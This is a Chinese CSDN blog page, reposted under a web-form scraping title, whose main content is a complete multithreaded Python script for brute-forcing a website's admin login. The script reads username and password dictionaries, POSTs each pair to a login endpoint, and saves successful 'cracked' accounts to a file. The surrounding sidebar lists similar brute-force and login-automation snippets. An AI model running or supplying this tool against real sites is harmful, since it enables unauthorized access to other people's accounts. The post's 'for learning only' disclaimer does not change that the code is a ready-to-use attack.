python爬虫爬web表单

最新推荐文章于 2024-04-20 10:38:09 发布
最新推荐文章于 2024-04-20 10:38:09 发布
阅读量270 收藏 1
点赞数
分类专栏: Python 文章标签: python 爬虫 web表单
原文链接:https://blog.csdn.net/JackLiu16/article/details/78917613
版权 
# -*- coding: utf-8 -*-
#利用python 写的多线程爆破后台用户名+密码(自备字典),比较实用,即使是在信息安全这么重视的今天,
#还是有人不加验证码或者异常访问限制之类的登陆验证方式,这样就很容易被弱口令爆破工具拿下,
#(本代码仅限学习实用,禁止进行web攻击,不承担法律责任)
import urllib2
import urllib
import httplib
import threading
  
headers = {"Content-Type":"application/x-www-form-urlencoded",     
           "Connection":"Keep-Alive",
           "Referer":"http://www.xxxxx.com/"};# referer:是代理的访问来源地址
# lock = threading.Lock()
def tryUser(user,password):
    #print user,password
    global headers
    global outFile 
    conn = httplib.HTTPConnection("www.xxxxx.com") # 远程域名
    if len(user) < 3:     # 限制用户名长度,排除字典中的无用数据
        return  # 主动退出线程
    else:
        #lock.acquire()   # 多线程操作文件,提前加锁,用后释放
        #line = inFile.readline()          
        #userData = line.strip().split(' # ') # strip() 默认去除空白字符包括' ','\t','\n'等
        #lock.release()
        user = user.strip()
        passwd = password.strip()
        params = urllib.urlencode({'username': user, 'password': passwd})
        conn.request(method="POST", url="/users/login", body=params, headers=headers) # 后台路径
        responseText = conn.getresponse().read().decode('utf8') # 网页编码
        #print responseText  # 第一次可以打印看看是否解析
        if not responseText.find(u'用户名或者密码不正确,请重新输入!') > 0 :
            print '----- find user:', user, 'with password:', passwd, '-----'
            outFile.write(user + '    ' +  passwd + '\n')
              
    return
  
outFile = open('accounts-cracked.txt', 'w')
  
if __name__ == '__main__':
    tsk=[] # 创建线程池
    with open(r'user.dic', 'r') as fUser:  
    # 使用with as 来打开文件,不需自己关闭文件,因为他会自己在合适的时候自已关闭(类似C# 中的using(...){}接口)
        with open(r'pass.dic', 'r') as fPass:
            for user in fUser.readlines():
                for password in fPass.readlines():
                    t= threading.Thread(target = tryUser,args=(user,password))
                    t.daemon = False # 设置不进行进程守护
                    tsk.append(t) # t.start()
                fPass.seek(0)
                # 记住这里要将文件重新移到文件首,不然就会出现只执行外层循环的第一条,因为内层在
                # 迭代之后(readlines()是迭代器的形式,迭代一次后文件指针就指到文件尾了,迭代器
                # 也是end了)第二次就没有password 在 fPass中,也就是说 for  password in fPass.readlines():
                # 为空,所以这里的内层循环就不会被执行了,因此也就是迭代器清零的问题(C ++ itertor 常有)                                        
    # join()无参数就是完全阻塞主线程,等待线程执行完 有参数就是说,
    # 在主线程等待一秒后就不阻塞线程了,继续执行主线程,这里的意思是一秒钟开一个线程
    # 不能再thread start之前调用join(), 因为join() 是线程运行时调度
    for t in tsk:
        t.start()
        t.join(1) 
    print "All thread OK,maybe not "
    outFile.close()

 

托比大王
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
python 写的http后台弱口令爆破工具
byteway的专栏
12-12 6172
利用python 写的多线程爆破后台用户名+密码(自备字典),比较实用,即使是在信息安全这么重视的今天,还是有人不加验证码或者异常访问限制之类的登陆验证方式,这样就很容易被弱口令爆破工具拿下,(本代码仅限学习实用,禁止进行web攻击,不承担法律责任)
python + web操作 爬虫 自动填写表单
热门推荐
CloudCver
08-21 1万+
python + web操作 爬虫 自动填写表单 Pre install package 安装webdriver库(chorme版本):找到你的版本,下载好放到Google/Chrome/Application文件夹下 http://npm.taobao.org/mirrors/chromedriver/ 安装python selenium库 pip3 install selenium 基本...
Python网络爬虫项目开发实战:怎么解决表单交互
最新发布
一个好知识的传播者
04-20 1023
注意:本文的下载教程,与以下文章的思路有相同点,也有不同点,最终目标只是让读者从多维度去熟练掌握本知识点。下载教程:Python网络爬虫项目开发实战_表单交互_编程案例解析实例详解课程教程.pdf。
爬虫(form表单提交)
weixin_30687587的博客
09-07 1249
import requests import json from lxml import etree # url = "https://m.ctrip.com/restapi/soa2/14666/json/TrainTransferListSearch?_fxpcqlniredt=09031127310306517228" #network中XHR加载出来的网址 hea...
[python爬虫]表单模拟登录(post请求,xpath数据解析,结果输出)
liyunyang2000的博客
06-10 717
表单模拟登录人人网,访问某个人的主页(如包贝尔主页),取其个人信息(姓名,代表作),将结果直接打印输出即可。
python 实现简单爆破form表单
weixin_33751566的博客
01-03 207
import httplib,urllibimport stringdef rf(): fp=open('1.txt','r') for i in fp: fp1=open('1.txt','r') for j in fp1: if(conn1(i.rstrip(),j.rstrip())): ...
python爬虫 selenium多端口
08-03
Python爬虫技术是一种用于自动化网页数据抓取的编程方法,它可以帮助我们从互联网上获取大量信息,例如新闻、产品价格、用户评论等。Selenium是一个强大的Web自动化测试工具,但同时也常被用作爬虫框架,因为它能...
python爬虫实例,快速入门
04-13
Python爬虫是网络数据抓取的一种技术,它允许开发者通过编写程序模拟浏览器行为来获取网页内容。本实例教程将引导初学者快速入门Python爬虫,主要涵盖了requests库的使用,包括GET、POST、PUT等HTTP请求方法以及参数...
好用的Python爬虫Web开发库汇总共2页.pdf.zip
10-28
在这个“好用的Python爬虫Web开发库汇总”中,我们可以期待找到一系列有助于提升开发效率和功能的工具。以下是针对标题、描述和标签中提到的一些关键知识点的详细解释: 1. **Python爬虫库**: - **...
python爬虫模拟知乎登录.zip
12-30
Python爬虫模拟知乎登录是网络数据采集领域中的一个重要实践,主要涉及到如何利用Python编程语言以及相关的库来模拟浏览器的行为,实现自动登录网站并获取登录后才能查看的数据。在这个案例中,我们将聚焦于Python的...
python爬虫 使用selenium 实现中英互译
03-23
Python爬虫技术在数据获取和自动化测试中扮演着重要角色,而Selenium作为一个强大的Web浏览器自动化工具,常常被用于模拟真实用户操作,如点击、滚动、填写表单等。在这个项目中,我们专注于使用Selenium实现中英...
python3 网页表格实例
07-01
python网页的表格内容, 并存入csv文件, 网页地址:http://app.finance.ifeng.com/data/stock/yjyg.php?symbol=000001
爬虫系列 一次采集.NET WebForm网站的坎坷历程
NET是世界上最好的语言
05-12 533
目录 先准备下一个GET/POST预备使用 登陆 抓取人员信息 采集列表 获取工号 入库 总结 今天接到一个活,需要统计人员的工号信息,由于种种原因不能直接连数据库 [无奈]、[无奈]、[无奈]。采取迂回方案,写个工具自动登录网站,采集用户信息。 这也不是第一次采集ASP.NET网站,以前采集的时候就知道,这种网站采集比较麻烦,尤其是WebForm的ASP.NET 网站,那叫一个费劲。 喜欢现在流行的Restful模式的网站,数据接口采集那才叫舒服。 闲话少说,开干 工作量不大,HT
Python写网络爬虫系列(三)表单处理
kkbb8811的博客
02-15 1906
import urllib,urllib2 LOGIN_URL = r'http://example.webscraping.com/user/login' LOGIN_EMAIL = 'kkbb8811@qq.com' LOGIN_PASSWORD ='qq123456' data ={'email':LOGIN_EMAIL,'password':LOGIN_PASSWORD} encoded
cookie 和session
pythondafahao的博客
04-01 217
HTTP协议本身是无状态的,怎么保存来过或登陆过网站的信息?所以我们需要在HTTP协议之外通过某种机制来识别用户的身份。于是就有了Session和Cookie。什么是Cookie,什么是Session?会话(Session)跟踪是Web程序中常用的技术,用来跟踪用户的整个会话。常用的会话跟踪技术是Cookie与Session。Cookie通过在客户端记录信息确定用户身份,Session通过在服务器...
python3爬虫学习系列06 -表单交互
besmarterbestronger的博客
08-09 244
文章目录一、登陆表单2. 使用Mechanize模块实现自动化表单处理三、参考文献 之前的博客: 爬虫学习系列02-常见的下载和抽取网页的方法 爬虫学习系列03-下载缓存 爬虫学习系列04 - 并发下载 爬虫学习系列05 - 获取动态内容 本节,将与网页进行交互,根据用户输入返回对应的内容。 发送POST请求提交表单; 使用cookie登陆网站; 用于简化表单提交的高级模块Mechanize。 ...
爬虫(6)-- 表单交互
ouprince
05-18 530
表单 form : <form action="#" enctype="application/x-www-form-urlencoded" method="post"> action 用于设置表单数据的提交地址;enctype 设置数据提交的编码; 输入:<input class="xxx" id="xxx" name="xxx" type="xxx" value=""/&...
Web暴力破解--前端JS表单加密进行爆破
2301_77300311的博客
04-07 577
从前台到后台是一个质的突破,本文主要对很多web 在登陆的过程中会用 js 对密码进行加密传输,梳理了一下web暴力猜解的技巧。常见的js实现加密的方式有:md5、base64、shal,写了一个简单的demo作为测试。2、分别选择用户名字典和密码字典,在设置密码字典的时候,选择md5加密方式对密码字段进行加密处理。四种爆破方式:单一字典爆破、多字段相同字典爆破、多字典位置对应爆破、聚合式爆破。最常用的应该是在爆破用户名和密码的时候,使用聚合方式枚举了。0x03 Web暴力猜解。方式二:Python脚本。
web后台登录口令暴力破解及防御
weixin_44023460的博客
01-06 7096
在实际网络安全评估测试中,前台是给用户使用,后台是给网站管理维护人员使用,前台功能相对简单,后台功能相对复杂,可能保护媒体文件上传,数据库管理等。前台用户可以自由注册,而后台是网站管理或者维护人员设定,渗透中如果能够拿到后台管理员帐号及密码,则意味着离获取webshell权限更进一步了。 1.1web后台账号及密码获取思路 1.通过sql注入获取后台账号及密码 如果网站存在sql注入漏洞,则可以通过sqlmap等工具进行漏洞测试,通过dump命令来获取整个数据库或者某个表中的数据。 2.通过跨站获取管理员帐
Python爬虫库框架学习及Python高度匿名代理IP
04-06
8. `mechanize`:一个有状态的Web浏览器库,支持表单提交等高级功能。 9. `socket`:Python的基础网络接口,提供了底层的套接字通信,对于需要自定义网络协议或底层通信的场景非常有用。 10. `Unirest for Python`...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值